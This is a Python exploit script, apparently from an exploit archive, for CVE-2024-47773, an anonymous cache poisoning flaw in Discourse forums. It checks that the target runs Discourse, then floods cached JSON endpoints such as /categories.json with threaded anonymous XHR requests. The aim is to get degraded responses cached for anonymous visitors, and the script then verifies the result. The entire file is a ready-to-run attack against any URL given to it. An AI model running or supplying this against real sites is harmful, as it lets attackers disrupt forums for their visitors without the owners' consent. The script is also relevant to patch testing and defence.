#!/usr/bin/env python3
"""
Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
Date: 2024-10-15
Exploit Author: ibrahimsql
Github: : https://github.com/ibrahmsql
Vendor Homepage: https://discourse.org
Software Link: https://github.com/discourse/discourse
Version: Discourse < latest (patched)
Tested on: Discourse 3.1.x, 3.2.x
CVE: CVE-2024-47773
CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
Description:
Discourse anonymous cache poisoning vulnerability allows attackers to poison
the cache with responses without preloaded data through multiple XHR requests.
This affects only anonymous visitors of the site.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-47773
"""
import requests
import sys
import argparse
import time
import threading
import json
from urllib.parse import urljoin
class DiscourseCachePoisoning:
def __init__(self, target_url, threads=10, timeout=10):
self.target_url = target_url.rstrip('/')
self.threads = threads
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest'
})
self.poisoned = False
def check_target(self):
"""Check if target is accessible and running Discourse"""
try:
response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
if response.status_code == 200:
if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
return True
except Exception as e:
print(f"[-] Error checking target: {e}")
return False
def check_anonymous_cache(self):
"""Check if anonymous cache is enabled"""
try:
# Test endpoint that should be cached for anonymous users
response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
# Check cache headers
cache_headers = ['cache-control', 'etag', 'last-modified']
has_cache = any(header in response.headers for header in cache_headers)
if has_cache:
print("[+] Anonymous cache appears to be enabled")
return True
else:
print("[-] Anonymous cache may be disabled")
return False
except Exception as e:
print(f"[-] Error checking cache: {e}")
return False
def poison_cache_worker(self, endpoint):
"""Worker function for cache poisoning attempts"""
try:
# Create session without cookies to simulate anonymous user
anon_session = requests.Session()
anon_session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest'
})
# Make rapid requests to poison cache
for i in range(50):
response = anon_session.get(
f"{self.target_url}{endpoint}",
timeout=self.timeout
)
# Check if response lacks preloaded data
if response.status_code == 200:
try:
data = response.json()
# Check for missing preloaded data indicators
if self.is_poisoned_response(data):
print(f"[+] Cache poisoning successful on {endpoint}")
self.poisoned = True
return True
except:
pass
time.sleep(0.1)
except Exception as e:
pass
return False
def is_poisoned_response(self, data):
"""Check if response indicates successful cache poisoning"""
# Look for indicators of missing preloaded data
indicators = [
# Missing or empty preloaded data
not data.get('preloaded', True),
data.get('preloaded') == {},
# Missing expected fields
'categories' in data and not data['categories'],
'topics' in data and not data['topics'],
# Error indicators
data.get('error') is not None,
data.get('errors') is not None
]
return any(indicators)
def test_cache_poisoning(self):
"""Test cache poisoning on multiple endpoints"""
print("[*] Testing cache poisoning vulnerability...")
# Target endpoints that are commonly cached
endpoints = [
'/categories.json',
'/latest.json',
'/top.json',
'/c/general.json',
'/site.json',
'/site/basic-info.json'
]
threads = []
for endpoint in endpoints:
print(f"[*] Testing endpoint: {endpoint}")
# Create multiple threads to poison cache
for i in range(self.threads):
thread = threading.Thread(
target=self.poison_cache_worker,
args=(endpoint,)
)
threads.append(thread)
thread.start()
# Wait for threads to complete
for thread in threads:
thread.join(timeout=5)
if self.poisoned:
break
time.sleep(1)
return self.poisoned
def verify_poisoning(self):
"""Verify if cache poisoning was successful"""
print("[*] Verifying cache poisoning...")
# Test with fresh anonymous session
verify_session = requests.Session()
verify_session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
try:
response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
if response.status_code == 200:
try:
data = response.json()
if self.is_poisoned_response(data):
print("[+] Cache poisoning verified - anonymous users affected")
return True
else:
print("[-] Cache poisoning not verified")
except:
print("[-] Unable to parse response")
else:
print(f"[-] Unexpected response code: {response.status_code}")
except Exception as e:
print(f"[-] Error verifying poisoning: {e}")
return False
def exploit(self):
"""Main exploit function"""
print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
print(f"[*] Target: {self.target_url}")
if not self.check_target():
print("[-] Target is not accessible or not running Discourse")
return False
print("[+] Target confirmed as Discourse instance")
if not self.check_anonymous_cache():
print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
print("[*] Continuing with exploit attempt...")
success = self.test_cache_poisoning()
if success:
print("[+] Cache poisoning attack successful!")
self.verify_poisoning()
print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
return True
else:
print("[-] Cache poisoning attack failed")
print("[*] Target may be patched or cache disabled")
return False
def main():
parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')
args = parser.parse_args()
exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)
try:
success = exploit.exploit()
sys.exit(0 if success else 1)
except KeyboardInterrupt:
print("\n[-] Exploit interrupted by user")
sys.exit(1)
except Exception as e:
print(f"[-] Exploit failed: {e}")
sys.exit(1)
if __name__ == '__main__':
main()